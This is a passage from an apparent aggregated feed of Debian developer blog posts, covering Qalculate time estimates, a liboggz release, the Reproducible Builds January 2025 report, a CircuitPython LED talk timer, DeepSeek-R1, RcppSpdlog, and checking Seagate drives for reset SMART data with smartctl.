Background Say you have started a long running copy job and you don't have the luxury of having a pipe you can insert pv(1) into to get a nice progress bar. For example, rsync or cp -R can have that problem (but not tar!). (Yes, you can use --info=progress2 in rsync, but that estimate is incremental and therefore inaccurate unless you disable the incremental mode with --no-inc-recursive, but then you pay a huge up-front wait cost while the entire directory gets crawled.)

Extracting a process start time First step is to gather data. Find the process start time. If you were unfortunate enough to forget to run date --iso-8601=seconds before starting, you can get a similar timestamp with stat(1) on the process tree in /proc with:
$ stat /proc/11232
  File: /proc/11232
  Size: 0               Blocks: 0          IO Block: 1024   directory
Device: 0,21    Inode: 57021       Links: 9
Access: (0555/dr-xr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2025-02-07 15:50:25.287220819 -0500
Modify: 2025-02-07 15:50:25.287220819 -0500
Change: 2025-02-07 15:50:25.287220819 -0500
 Birth: -
So our start time is 2025-02-07 15:50:25, we shave off the nanoseconds there, they're below our precision noise floor. If you're not dealing with an actual UNIX process, you need to figure out a start time: this can be a SQL query, a network request, whatever, exercise for the reader.

Saving a variable This is optional, but for the sake of demonstration, let's save this as a variable:
> start="2025-02-07 15:50:25"
  save("2025-02-07T15:50:25"; start; Temporary; ; 1) =
  "2025-02-07T15:50:25"

Estimating data size Next, estimate your data size. That will vary wildly with the job you're running: this can be anything: number of files, documents being processed, rows to be destroyed in a database, whatever. In this case, rsync tells me how many bytes it has transferred so far:
# rsync -ASHaXx --info=progress2 /srv/ /srv-zfs/
2.968.252.503.968  94%    7,63MB/s    6:04:58  xfr#464440, ir-chk=1000/982266) 
Strip off the weird dots in there, because that will confuse qalculate, which will count this as:
  2.968252503968 bytes   2.968 B
Or, essentially, three bytes. We actually transferred almost 3TB here:
  2968252503968 bytes   2.968 TB
So let's use that. If you had the misfortune of making rsync silent, but were lucky enough to transfer entire partitions, you can use df (without -h! we want to be more precise here), in my case:
Filesystem              1K-blocks       Used  Available Use% Mounted on
/dev/mapper/vg_hdd-srv 7512681384 7258298036  179205040  98% /srv
tank/srv               7667173248 2870444032 4796729216  38% /srv-zfs
(Otherwise, of course, you use du -sh $DIRECTORY.)

Digression over bytes Those are 1 K bytes which is actually (and rather unfortunately) Ki, or "kibibytes" (1024 bytes), not "kilobytes" (1000 bytes). Ugh.
> 2870444032 KiB
  2870444032 kibibytes   2.939 TB
> 2870444032 kB
  2870444032 kilobytes   2.870 TB
At this scale, those details matter quite a bit, we're talking about a 69GB (64GiB) difference here:
> 2870444032 KiB - 2870444032 kB
  (2870444032 kibibytes)   (2870444032 kilobytes)   68.89 GB
Anyways. Let's take 2968252503968 bytes as our current progress. Our entire dataset is 7258298064 KiB, as seen above.

Solving a cross-multiplication We have 3 out of four variables for our equation here, so we can already solve:
> (now-start)/x = (2996538438607 bytes)/(7258298064 KiB) to h
  ((actual   start) / x) = ((2996538438607 bytes) / (7258298064
  kibibytes))
  x   59.24 h
The entire transfer will take about 60 hours to complete! Note that's not the time left, that is the total time. To break this down step by step, we could calculate how long it has taken so far:
> now-start
  now   start   23 h + 53 min + 6.762 s
> now-start to s
  now   start   85987 s
... and do the cross-multiplication manually, it's basically:
x/(now-start) = (total/current)
so:
x = (total/current) * (now-start)
or, in Qalc:
> ((7258298064  kibibytes) / ( 2996538438607 bytes) ) *  85987 s
  ((7258298064 kibibytes) / (2996538438607 bytes))   (85987 secondes)  
  2 d + 11 h + 14 min + 38.81 s
It's interesting it gives us different units here! Not sure why.

Now and built-in variables The now here is actually a built-in variable:
> now
  now   "2025-02-08T22:25:25"
There is a bewildering list of such variables, for example:
> uptime
  uptime = 5 d + 6 h + 34 min + 12.11 s
> golden
  golden   1.618
> exact
  golden = ( (5) + 1) / 2

Computing dates In any case, yay! We know the transfer is going to take roughly 60 hours total, and we've already spent around 24h of that, so, we have 36h left. But I did that all in my head, we can ask more of Qalc yet! Let's make another variable, for that total estimated time:
> total=(now-start)/x = (2996538438607 bytes)/(7258298064 KiB)
  save(((now   start) / x) = ((2996538438607 bytes) / (7258298064
  kibibytes)); total; Temporary; ; 1)  
  2 d + 11 h + 14 min + 38.22 s
And we can plug that into another formula with our start time to figure out when we'll be done!
> start+total
  start + total   "2025-02-10T03:28:52"
> start+total-now
  start + total   now   1 d + 11 h + 34 min + 48.52 s
> start+total-now to h
  start + total   now   35 h + 34 min + 32.01 s
That transfer has ~1d left, or 35h24m32s, and should complete around 4 in the morning on February 10th. But that's icing on top. I typically only do the cross-multiplication and calculate the remaining time in my head. I mostly did the last bit to show Qalculate could compute dates and time differences, as long as you use ISO timestamps. Although it can also convert to and from UNIX timestamps, it cannot parse arbitrary date strings (yet?).

Other functionality Qalculate can:
  • Plot graphs;
  • Use RPN input;
  • Do all sorts of algebraic, calculus, matrix, statistics, trigonometry functions (and more!);
  • ... and so much more!
I have a hard time finding things it cannot do. When I get there, I typically need to resort to programming code in Python, use a spreadsheet, and others will turn to more complete engines like Maple, Mathematica or R. But for daily use, Qalculate is just fantastic. And it's pink! Use it!

Further reading and installation This is just scratching the surface, the fine manual has more information, including more examples. There is also of course a qalc(1) manual page which also ships an excellent EXAMPLES section. Qalculate is packaged for over 30 Linux distributions, but also ships packages for Windows and MacOS. There are third-party derivatives as well including a web version and an Android app.

Updates Colin Watson liked this blog post and was inspired to write his own hacks, similar to what's here, but with extras, check it out!

Petter Reinholdtsen: New oggz release 1.1.2 after 15 years

A little over a week ago, I noticed the liboggz package on my Debian dashboard had not had a new upstream release for a while. A closer look showed that its last release, version 1.1.1, happened in 2010. A few patches had accumulated in the Debian package, and I even noticed that I had passed on these patches to upstream five years ago. A handful crash bugs had been reported against the Debian package, and looking at the upstream repository I even found a few crash bugs reported there too. To add insult to injury, I discovered that upstream had accumulated several fixes in the years between 2010 and now, and many of them had not made their way into the Debian package. I decided enough was enough, and that a new upstream release was needed fixing these nasty crash bugs. Luckily I am also a member of the Xiph team, aka upstream, and could actually go to work immediately to fix it. I started by adding automatic build testing on the Xiph gitlab oggz instance, to get a better idea of the state of affairs with the code base. This exposed a few build problems, which I had to fix. In parallel to this, I sent an email announcing my wish for a new release to every person who had committed to the upstream code base since 2010, and asked for help doing a new release both on email and on the #xiph IRC channel. Sadly only a fraction of their email providers accepted my email. But Ralph Giles in the Xiph team came to the rescue and provided invaluable help to guide be through the release Xiph process. While this was going on, I spent a few days tracking down the crash bugs with good help from valgrind, and came up with patch proposals to get rid of at least these specific crash bugs. The open issues also had to be checked. Several of them proved to be fixed already, but a few I had to creat patches for. I also checked out the Debian, Arch, Fedora, Suse and Gentoo packages to see if there were patches applied in these Linux distributions that should be passed upstream. The end result was ready yesterday. A new liboggz release, version 1.1.2, was tagged, wrapped up and published on the project page. And today, the new release was uploaded into Debian. You are probably by now curious on what actually changed in the library. I guess the most interesting new feature was support for Opus and VP8. Almost all other changes were stability or documentation fixes. The rest were related to the gitlab continuous integration testing. All in all, this was really a minor update, hence the version bump only from 1.1.1 to to 1.1.2, but it was long overdue and I am very happy that it is out the door. One change proposed upstream was not included this time, as it extended the API and changed some of the existing library methods, and thus require a major SONAME bump and possibly code changes in every program using the library. As I am not that familiar with the code base, I am unsure if I am the right person to evaluate the change. Perhaps later. Since the release was tagged, a few minor fixes has been committed upstream already: automatic testing the cross building to Windows, and documentation updates linking to the correct project page. If a important issue is discovered with this release, I guess a new release might happen soon including the minor fixes. If not, perhaps they can wait fifteen years. :) I would like to send a big thank you to everyone that helped make this release happen, from the people adding fixes upstream over the course of fifteen years, to the ones reporting crash bugs, other bugs and those maintaining the package in various Linux distributions. Thank you very much for your time and interest. As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

5 February 2025

Reproducible Builds: Reproducible Builds in January 2025

Welcome to the first report in 2025 from the Reproducible Builds project! Our monthly reports outline what we ve been up to over the past month and highlight items of news from elsewhere in the world of software supply-chain security when relevant. As usual, though, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. Table of contents:
  1. reproduce.debian.net
  2. Two new academic papers
  3. Distribution work
  4. On our mailing list
  5. Upstream patches
  6. diffoscope
  7. Website updates
  8. Reproducibility testing framework

reproduce.debian.net The last few months saw the introduction of reproduce.debian.net. Announced at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project. Powering that is rebuilderd, our server designed monitor the official package repositories of Linux distributions and attempt to reproduce the observed results there. This month, however, we are pleased to announce that in addition to the existing amd64.reproduce.debian.net and i386.reproduce.debian.net architecture-specific pages, we now build for a three more architectures (for a total of five) arm64 armhf and riscv64.

Two new academic papers Giacomo Benedetti, Oreofe Solarin, Courtney Miller, Greg Tystahl, William Enck, Christian K stner, Alexandros Kapravelos, Alessio Merlo and Luca Verderame published an interesting article recently. Titled An Empirical Study on Reproducible Packaging in Open-Source Ecosystem, the abstract outlines its optimistic findings:
[We] identified that with relatively straightforward infrastructure configuration and patching of build tools, we can achieve very high rates of reproducible builds in all studied ecosystems. We conclude that if the ecosystems adopt our suggestions, the build process of published packages can be independently confirmed for nearly all packages without individual developer actions, and doing so will prevent significant future software supply chain attacks.
The entire PDF is available online to view.
In addition, Julien Malka, Stefano Zacchiroli and Th o Zimmermann of T l com Paris in-house research laboratory, the Information Processing and Communications Laboratory (LTCI) published an article asking the question: Does Functional Package Management Enable Reproducible Builds at Scale?. Answering strongly in the affirmative, the article s abstract reads as follows:
In this work, we perform the first large-scale study of bitwise reproducibility, in the context of the Nix functional package manager, rebuilding 709,816 packages from historical snapshots of the nixpkgs repository[. We] obtain very high bitwise reproducibility rates, between 69 and 91% with an upward trend, and even higher rebuildability rates, over 99%. We investigate unreproducibility causes, showing that about 15% of failures are due to embedded build dates. We release a novel dataset with all build statuses, logs, as well as full diffoscopes: recursive diffs of where unreproducible build artifacts differ.
As above, the entire PDF of the article is available to view online.

Distribution work There as been the usual work in various distributions this month, such as:
  • 10+ reviews of Debian packages were added, 11 were updated and 10 were removed this month adding to our knowledge about identified issues. A number of issue types were updated also.
  • The FreeBSD Foundation announced that a planned project to deliver zero-trust builds has begun in January 2025 . Supported by the Sovereign Tech Agency, this project is centered on the various build processes, and that the primary goal of this work is to enable the entire release process to run without requiring root access, and that build artifacts build reproducibly that is, that a third party can build bit-for-bit identical artifacts. The full announcement can be found online, which includes an estimated schedule and other details.

On our mailing list On our mailing list this month:
  • Following-up to a substantial amount of previous work pertaining the Sphinx documentation generator, James Addison asked a question pertaining to the relationship between SOURCE_DATE_EPOCH environment variable and testing that generated a number of replies.
  • Adithya Balakumar of Toshiba asked a question about whether it is possible to make ext4 filesystem images reproducible. Adithya s issue is that even the smallest amount of post-processing of the filesystem results in the modification of the Last mount and Last write timestamps.
  • James Addison also investigated an interesting issue surrounding our disorderfs filesystem. In particular:
    FUSE (Filesystem in USErspace) filesystems such as disorderfs do not delete files from the underlying filesystem when they are deleted from the overlay. This can cause seemingly straightforward tests for example, cases that expect directory contents to be empty after deletion is requested for all files listed within them to fail.

Upstream patches The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:

diffoscope diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 285, 286 and 287 to Debian:
  • Security fixes:
    • Validate the --css command-line argument to prevent a potential Cross-site scripting (XSS) attack. Thanks to Daniel Schmidt from SRLabs for the report. [ ]
    • Prevent XML entity expansion attacks. Thanks to Florian Wilkens from SRLabs for the report.. [ ][ ]
    • Print a warning if we have disabled XML comparisons due to a potentially vulnerable version of pyexpat. [ ]
  • Bug fixes:
    • Correctly identify changes to only the line-endings of files; don t mark them as Ordering differences only. [ ]
    • When passing files on the command line, don t call specialize( ) before we ve checked that the files are identical or not. [ ]
    • Do not exit with a traceback if paths are inaccessible, either directly, via symbolic links or within a directory. [ ]
    • Don t cause a traceback if cbfstool extraction failed.. [ ]
    • Use the surrogateescape mechanism to avoid a UnicodeDecodeError and crash when any decoding zipinfo output that is not UTF-8 compliant. [ ]
  • Testsuite improvements:
    • Don t mangle newlines when opening test fixtures; we want them untouched. [ ]
    • Move to assert_diff in test_text.py. [ ]
  • Misc improvements:
    • Drop unused subprocess imports. [ ][ ]
    • Drop an unused function in iso9600.py. [ ]
    • Inline a call and check of Config().force_details; no need for an additional variable in this particular method. [ ]
    • Remove an unnecessary return value from the Difference.check_for_ordering_differences method. [ ]
    • Remove unused logging facility from a few comparators. [ ]
    • Update copyright years. [ ][ ]
In addition, fridtjof added support for the ASAR .tar-like archive format. [ ][ ][ ][ ] and lastly, Vagrant Cascadian updated diffoscope in GNU Guix to version 285 [ ][ ] and 286 [ ][ ].
strip-nondeterminism is our sister tool to remove specific non-deterministic results from a completed build. This month version 1.14.1-1 was uploaded to Debian unstable by Chris Lamb, making the following the changes:
  • Clarify the --verbose and non --verbose output of bin/strip-nondeterminism so we don t imply we are normalizing files that we are not. [ ]
  • Bump Standards-Version to 4.7.0. [ ]

Website updates There were a large number of improvements made to our website this month, including:

Reproducibility testing framework The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In January, a number of changes were made by Holger Levsen, including:
  • reproduce.debian.net-related:
    • Add support for rebuilding the armhf architecture. [ ][ ]
    • Add support for rebuilding the arm64 architecture. [ ][ ][ ][ ]
    • Add support for rebuilding the riscv64 architecture. [ ][ ]
    • Move the i386 builder to the osuosl5 node. [ ][ ][ ][ ]
    • Don t run our rebuilders on a public port. [ ][ ]
    • Add database backups on all builders and add links. [ ][ ]
    • Rework and dramatically improve the statistics collection and generation. [ ][ ][ ][ ][ ][ ]
    • Add contact info to the main page [ ], thumbnails [ ] as well as the new, missing architectures. [ ]
    • Move the amd64 worker to the osuosl4 and node. [ ]
    • Run the underlying debrebuild script under nice. [ ]
    • Try to use TMPDIR when calling debrebuild. [ ][ ]
  • buildinfos.debian.net-related:
    • Stop creating buildinfo-pool_$ suite _$ arch .list files. [ ]
    • Temporarily disable automatic updates of pool links. [ ]
  • FreeBSD-related:
    • Fix the sudoers to actually permit builds. [ ]
    • Disable debug output for FreeBSD rebuilding jobs. [ ]
    • Upgrade to FreeBSD 14.2 [ ] and document that bmake was installed on the underlying FreeBSD virtual machine image [ ].
  • Misc:
    • Update the real year to 2025. [ ]
    • Don t try to install a Debian bookworm kernel from backports on the infom08 node which is running Debian trixie. [ ]
    • Don t warn about system updates for systems running Debian testing. [ ]
    • Fix a typo in the ZOMBIES definition. [ ][ ]
In addition:
  • Ed Maste modified the FreeBSD build system to the clean the object directory before commencing a build. [ ]
  • Gioele Barabucci updated the rebuilder stats to first add a category for network errors [ ] as well as to categorise failures without a diffoscope log [ ].
  • Jessica Clarke also made some FreeBSD-related changes, including:
    • Ensuring we clean up the object directory for second build as well. [ ][ ]
    • Updating the sudoers for the relevant rm -rf command. [ ]
    • Update the cleanup_tmpdirs method to to match other removals. [ ]
  • Jochen Sprickerhof:
  • Roland Clobus:
    • Update the reproducible_debstrap job to call Debian s debootstrap with the full path [ ] and to use eatmydata as well [ ][ ].
    • Make some changes to deduce the CPU load in the debian_live_build job. [ ]
Lastly, both Holger Levsen [ ] and Vagrant Cascadian [ ] performed some node maintenance.
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

4 February 2025

Valhalla's Things: Conference Talk Timeout Ring, Part One

Posted on February 4, 2025
Tags: madeof:atoms, madeof:bits
low quality video of a ring of rgb LED in front of a computer: the LED light up one at a time in colours that go from yellow to red. A few ago I may have accidentally bought a ring of 12 RGB LEDs; I soldered temporary leads on it, connected it to a CircuitPython supported board and played around for a while. They we had a couple of friends come over to remote FOSDEM together, and I had talked with one of them about WS2812 / NeoPixels, so I brought them to the living room, in case there was a chance to show them in sort-of-use. Then I was dealing with playing the various streams as we moved from one room to the next, which lead to me being called video team , which lead to me wearing a video team shirt (from an old DebConf, not FOSDEM, but still video team), which lead to somebody asking me whether I also had the sheet with the countdown to the end of the talk, and the answer was sort-of-yes (I should have the ones we used to use for our Linux Day), but not handy. But I had a thing with twelve things in a clock-like circle. A bit of fiddling on the CircuitPython REPL resulted, if I remember correctly, in something like:
import board
import neopixel
import time
num_pixels = 12
pixels = neopixel.NeoPixel(board.GP0, num_pixels)
pixels.brightness = 0.1
def end(min):
    pixels.fill((0, 0, 0))
    for i in range(12):
        pixels[i] = (127 + 10 * i, 8 * (12 - i), 0)
        pixels[i-1] = (0, 0, 0)
        time.sleep(min * 5)  # min * 60 / 12
Now, I wasn t very consistent in running end, especially since I wasn t sure whether I wanted to run it at the beginning of the talk with the full duration or just in the last 5 - 10 minutes depending of the length of the slot, but I ve had at least one person agree that the general idea has potential, so I m taking these notes to be able to work on it in the future. One thing that needs to be fixed is the fact that with the ring just attached with temporary wires and left on the table it isn t clear which LED is number 0, so it will need a bit of a case or something, but that s something that can be dealt with before the next fosdem. And I should probably add some input interface, so that it is self-contained and not tethered to a computer and run from the REPL. (And then I may also have a vague idea for putting that ring into some wearable thing: good thing that I actually bought two :D )

2 February 2025

Colin Watson: Free software activity in January 2025

Most of my Debian contributions this month were sponsored by Freexian. If you appreciate this sort of work and are at a company that uses Debian, have a look to see whether you can pay for any of Freexian s services; as well as the direct benefits, that revenue stream helps to keep Debian development sustainable for me and several other lovely people. You can also support my work directly via Liberapay. Python team We finally made Python 3.13 the default version in testing! I fixed various bugs that got in the way of this: As with last month, I fixed a few more build regressions due to the removal of a deprecated intersphinx_mapping syntax in Sphinx 8.0: I ported a few packages to Django 5.1: I ported python-pypump to IPython 8.0. I fixed python-datamodel-code-generator to handle isort 6, and contributed that upstream. I fixed some packages to tolerate future versions of dh-python that will drop their dependency on python3-setuptools: I removed the old python-celery-common transitional package from celery, since nothing in Debian needs it any more. I fixed or helped to fix various other build/test failures: I upgraded these packages to new upstream versions: Rust team I fixed rust-pyo3-ffi to avoid explicit Python version dependencies that were getting in the way of making Python 3.13 the default version. Security tools packaging team I uploaded libevt to fix a build failure on i386 and to tolerate future versions of dh-python that will drop their dependency on python3-setuptools. Installer team I helped with some testing of a debian-installer-utils patch as part of the /usr move. I need to get around to uploading this, since it looks OK now. Other small things Helmut Grohne reached out for help debugging a multi-arch coinstallability problem (you know it s going to be complicated when even Helmut can t figure it out on his own ) in binutils, and we had a call about that. I reviewed and applied a new Romanian translation of debconf s manual pages. I did my twice-yearly refresh of debmirror s mirror_size documentation, and applied a contribution to improve the example debmirror.conf. I fixed an arguable preprocessor string handling bug in man-db, and applied a fix for out-of-tree builds.

Anuradha Weeraman: DeepSeek-R1, at the cusp of an open revolution

DeepSeek-R1, at the cusp of an open revolutionDeepSeek R1, the new entrant to the Large Language Model wars has created quite a splash over the last few weeks. Its entrance into a space dominated by the Big Corps, while pursuing asymmetric and novel strategies has been a refreshing eye-opener.GPT AI improvement was starting to show signs of slowing down, and has been observed to be reaching a point of diminishing returns as it runs out of data and compute required to train, fine-tune increasingly large models. This has turned the focus towards building "reasoning" models that are post-trained through reinforcement learning, techniques such as inference-time and test-time scaling and search algorithms to make the models appear to think and reason better. OpenAI&aposs o1-series models were the first to achieve this successfully with its inference-time scaling and Chain-of-Thought reasoning.

Intelligence as an emergent property of Reinforcement Learning (RL)Reinforcement Learning (RL) has been successfully used in the past by Google&aposs DeepMind team to build highly intelligent and specialized systems where intelligence is observed as an emergent property through rewards-based training approach that yielded achievements like AlphaGo (see my post on it here - AlphaGo: a journey to machine intuition).DeepMind went on to build a series of Alpha* projects that achieved many notable feats using RL:
  • AlphaGo, defeated the world champion Lee Seedol in the game of Go
  • AlphaZero, a generalized system that learned to play games such as Chess, Shogi and Go without human input
  • AlphaStar, achieved high performance in the complex real-time strategy game StarCraft II.
  • AlphaFold, a tool for predicting protein structures which significantly advanced computational biology.
  • AlphaCode, a model designed to generate computer programs, performing competitively in coding challenges.
  • AlphaDev, a system developed to discover novel algorithms, notably optimizing sorting algorithms beyond human-derived methods.
All of these systems achieved mastery in its own area through self-training/self-play and by optimizing and maximizing the cumulative reward over time by interacting with its environment where intelligence was observed as an emergent property of the system.
DeepSeek-R1, at the cusp of an open revolutionThe RL feedback loop
RL mimics the process through which a baby would learn to walk, through trial, error and first principles.

R1 model training pipelineAt a technical level, DeepSeek-R1 leverages a combination of Reinforcement Learning (RL) and Supervised Fine-Tuning (SFT) for its training pipeline:
DeepSeek-R1, at the cusp of an open revolutionDeepSeek-R1 Model Training Pipeline
Using RL and DeepSeek-v3, an interim reasoning model was built, called DeepSeek-R1-Zero, purely based on RL without relying on SFT, which demonstrated superior reasoning capabilities that matched the performance of OpenAI&aposs o1 in certain benchmarks such as AIME 2024.The model was however affected by poor readability and language-mixing and is only an interim-reasoning model built on RL principles and self-evolution.DeepSeek-R1-Zero was then used to generate SFT data, which was combined with supervised data from DeepSeek-v3 to re-train the DeepSeek-v3-Base model.The new DeepSeek-v3-Base model then underwent additional RL with prompts and scenarios to come up with the DeepSeek-R1 model.The R1-model was then used to distill a number of smaller open source models such as Llama-8b, Qwen-7b, 14b which outperformed bigger models by a large margin, effectively making the smaller models more accessible and usable.

Key contributions of DeepSeek-R1
  1. RL without the need for SFT for emergent reasoning capabilities
R1 was the first open research project to validate the efficacy of RL directly on the base model without relying on SFT as a first step, which resulted in the model developing advanced reasoning capabilities purely through self-reflection and self-verification.Although, it did degrade in its language capabilities during the process, its Chain-of-Thought (CoT) capabilities for solving complex problems was later used for further RL on the DeepSeek-v3-Base model which became R1. This is a significant contribution back to the research community.The below analysis of DeepSeek-R1-Zero and OpenAI o1-0912 shows that it is viable to attain robust reasoning capabilities purely through RL alone, which can be further augmented with other techniques to deliver even better reasoning performance.
DeepSeek-R1, at the cusp of an open revolutionSource: https://github.com/deepseek-ai/DeepSeek-R1
Its quite interesting, that the application of RL gives rise to seemingly human capabilities of "reflection", and arriving at "aha" moments, causing it to pause, ponder and focus on a specific aspect of the problem, resulting in emergent capabilities to problem-solve as humans do.
  1. Model distillation
DeepSeek-R1 also demonstrated that larger models can be distilled into smaller models which makes advanced capabilities accessible to resource-constrained environments, such as your laptop. While its not possible to run a 671b model on a stock laptop, you can still run a distilled 14b model that is distilled from the larger model which still performs better than most publicly available models out there. This enables intelligence to be brought closer to the edge, to allow faster inference at the point of experience (such as on a smartphone, or on a Raspberry Pi), which paves way for more use cases and possibilities for innovation.
DeepSeek-R1, at the cusp of an open revolutionSource: https://github.com/deepseek-ai/DeepSeek-R1
Distilled models are very different to R1, which is a massive model with a completely different model architecture than the distilled variants, and so are not directly comparable in terms of capability, but are instead built to be more smaller and efficient for more constrained environments. This technique of being able to distill a larger model&aposs capabilities down to a smaller model for portability, accessibility, speed, and cost will bring about a lot of possibilities for applying artificial intelligence in places where it would have otherwise not been possible. This is another key contribution of this technology from DeepSeek, which I believe has even further potential for democratization and accessibility of AI.
DeepSeek-R1, at the cusp of an open revolution

Why is this moment so significant?DeepSeek-R1 was a pivotal contribution in many ways.
  1. The contributions to the state-of-the-art and the open research helps move the field forward where everybody benefits, not just a few highly funded AI labs building the next billion dollar model.
  2. Open-sourcing and making the model freely available follows an asymmetric strategy to the prevailing closed nature of much of the model-sphere of the larger players. DeepSeek should be commended for making their contributions free and open.
  3. It reminds us that its not just a one-horse race, and it incentivizes competition, which has already resulted in OpenAI o3-mini a cost-effective reasoning model which now shows the Chain-of-Thought reasoning. Competition is a good thing.
  4. We stand at the cusp of an explosion of small-models that are hyper-specialized, and optimized for a specific use case that can be trained and deployed cheaply for solving problems at the edge. It raises a lot of exciting possibilities and is why DeepSeek-R1 is one of the most pivotal moments of tech history.
Truly exciting times. What will you build?

Dirk Eddelbuettel: RcppSpdlog 0.0.20 on CRAN: New Upstream, New Features

Version 0.0.20 of RcppSpdlog arrived on CRAN early this morning and has been uploaded to Debian. RcppSpdlog bundles spdlog, a wonderful header-only C++ logging library with all the bells and whistles you would want that was written by Gabi Melman, and also includes fmt by Victor Zverovich. You can learn more at the nice package documention site. This release updates the code to the version 1.15.1 of spdlog which was released this morning as well. It also contains a contributed PR which illustrates logging in a multithreaded context. The NEWS entry for this release follows.

Changes in RcppSpdlog version 0.0.20 (2025-02-01)
  • New multi-threaded logging example (Young Geun Kim and Dirk via #22)
  • Upgraded to upstream release spdlog 1.15.1

Courtesy of my CRANberries, there is also a diffstat report. More detailed information is on the RcppSpdlog page, or the package documention site.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

1 February 2025

Guido G nther: Free Software Activities January 2025

Another short status update of what happened on my side last month. Mostly focused on quality of life improvements in phosh and cleaning up and improving phoc this time around (including catching up with wlroots git) but some improvements for other things like phosh-osk-stub happened on the side line too. phosh phoc phosh-osk-stub xdg-desktop-portal-phosh phosh-recipes libcmatrix phrog Debian git-buildpackage livi feedbackd Wayland protocols Wlroots Bug reports Reviews This is not code by me but reviews on other peoples code. The list is incomplete, but I hope to improve on this in the upcoming months. Thanks for the contributions! Help Development If you want to support my work see donations. Comments? Join the Fediverse thread

31 January 2025

Gunnar Wolf: ChatGPT is bullshit

This post is an unpublished review for ChatGPT is bullshit
As people around the world understand how LLMs behave, more and more people wonder as to why these models hallucinate, and what can be done about to reduce it. This provocatively named article by Michael Townsen Hicks, James Humphries and Joe Slater bring is an excellent primer to better understanding how LLMs work and what to expect from them. As humans carrying out our relations using our language as the main tool, we are easily at awe with the apparent ease with which ChatGPT (the first widely available, and to this day probably the best known, LLM-based automated chatbot) simulates human-like understanding and how it helps us to easily carry out even daunting data aggregation tasks. It is common that people ask ChatGPT for an answer and, if it gets part of the answer wrong, they justify it by stating that it s just a hallucination. Townsen et al. invite us to switch from that characterization to a more correct one: LLMs are bullshitting. This term is formally presented by Frankfurt [1]. To Bullshit is not the same as to lie, because lying requires to know (and want to cover) the truth. A bullshitter not necessarily knows the truth, they just have to provide a compelling description, regardless of what is really aligned with truth. After introducing Frankfurt s ideas, the authors explain the fundamental ideas behind LLM-based chatbots such as ChatGPT; a Generative Pre-trained Transformer (GPT) s have as their only goal to produce human-like text, and it is carried out mainly by presenting output that matches the input s high-dimensional abstract vector representation, and probabilistically outputs the next token (word) iteratively with the text produced so far. Clearly, a GPT s ask is not to seek truth or to convey useful information they are built to provide a normal-seeming response to the prompts provided by their user. Core data are not queried to find optimal solutions for the user s requests, but are generated on the requested topic, attempting to mimic the style of document set it was trained with. Erroneous data emitted by a LLM is, thus, not equiparable with what a person could hallucinate with, but appears because the model has no understanding of truth; in a way, this is very fitting with the current state of the world, a time often termed as the age of post-truth [2]. Requesting an LLM to provide truth in its answers is basically impossible, given the difference between intelligence and consciousness: Following Harari s definitions [3], LLM systems, or any AI-based system, can be seen as intelligent, as they have the ability to attain goals in various, flexible ways, but they cannot be seen as conscious, as they have no ability to experience subjectivity. This is, the LLM is, by definition, bullshitting its way towards an answer: their goal is to provide an answer, not to interpret the world in a trustworthy way. The authors close their article with a plea for literature on the topic to adopt the more correct bullshit term instead of the vacuous, anthropomorphizing hallucination . Of course, being the word already loaded with a negative meaning, it is an unlikely request. This is a great article that mixes together Computer Science and Philosophy, and can shed some light on a topic that is hard to grasp for many users. [1] Frankfurt, Harry (2005). On Bullshit. Princeton University Press. [2] Zoglauer, Thomas (2023). Constructed truths: truth and knowledge in a post-truth world. Springer. [3] Harari, Yuval Noah (2023. Nexus: A Brief History of Information Networks From the Stone Age to AI. Random House.

Daniel Lange: Seagate old hard disks sold as new, smartmontools v7.4 for Debian Bullseye and Bookworm

Apparently somebody managed to resell Seagate hard disks that have 2-5 years of operations on them as brand new. They did this by using some new shrink wrap bags and resetting the used hard disk SMART attributes to factory-new values. Image of Seagate Exos X24 hard disk Luckily Seagate has a proprietary extension "Seagate FARM (Field Access Reliability Metrics)" implemented in their disks that ... the crooks did not reset. Luckily ... because other manufacturers do not have that extension. And you think the crooks only re-sell used Seagate disks? Lol. The get access to the Seagate FARM extension, you need smartctl from smartmontools v7.4 or later. For Debian 12 (Bookworm) you can add the backports archive and then install with apt install smartmontools/bookworm-backports. For Debian 11 (Bullseye) you can use a backport we created at my company:
File sha256
smartmontools_7.4-2~bpo11+1_amd64.deb e09da1045549d9b85f2cd7014d1f3ca5d5f0b9376ef76f68d8d303ad68fdd108
You can also download static builds from https://builds.smartmontools.org/ which keeps the latest CI builds of the current development branch (v7.5 at the time of writing). To check the state of your drives, compare the output from smartctl -x and smartctl -l farm. Double checking Power_On_Hours vs. "Power on Hours" is the obvious. But the other values around "Head Flight Hours" and "Power Cycle Count" should also roughly match what you expect from a hard disk of a certain age. All near zero, of course, for a factory-new hard disk. This is what it looks like for a hard disk that has gracefully serviced 4 years and 8 months so far. The smartctl -x and smartctl -l farm data match within some small margins:
$ smartctl -x /dev/sda

smartctl 7.4 2023-08-01 r5530 [x86_64-linux-6.1.0-30-amd64] (local build)
Copyright (C) 2002-23, Bruce Allen, Christian Franke, www.smartmontools.org

=== START OF INFORMATION SECTION ===
Model Family: Seagate Exos X14
Device Model: ST10000NM0568-2H5110
[..]
Vendor Specific SMART Attributes with Thresholds:
ID# ATTRIBUTE_NAME FLAGS VALUE WORST THRESH FAIL RAW_VALUE
[..]
4 Start_Stop_Count -O--CK 100 100 020 - 26
[..]
9 Power_On_Hours -O--CK 054 054 000 - 40860
10 Spin_Retry_Count PO--C- 100 100 097 - 0
12 Power_Cycle_Count -O--CK 100 100 020 - 27
[..]
192 Power-Off_Retract_Count -O--CK 100 100 000 - 708
193 Load_Cycle_Count -O--CK 064 064 000 - 72077
[..]
240 Head_Flying_Hours ------ 100 253 000 - 21125h+51m+45.748s
$ smartctl -l farm /dev/sda

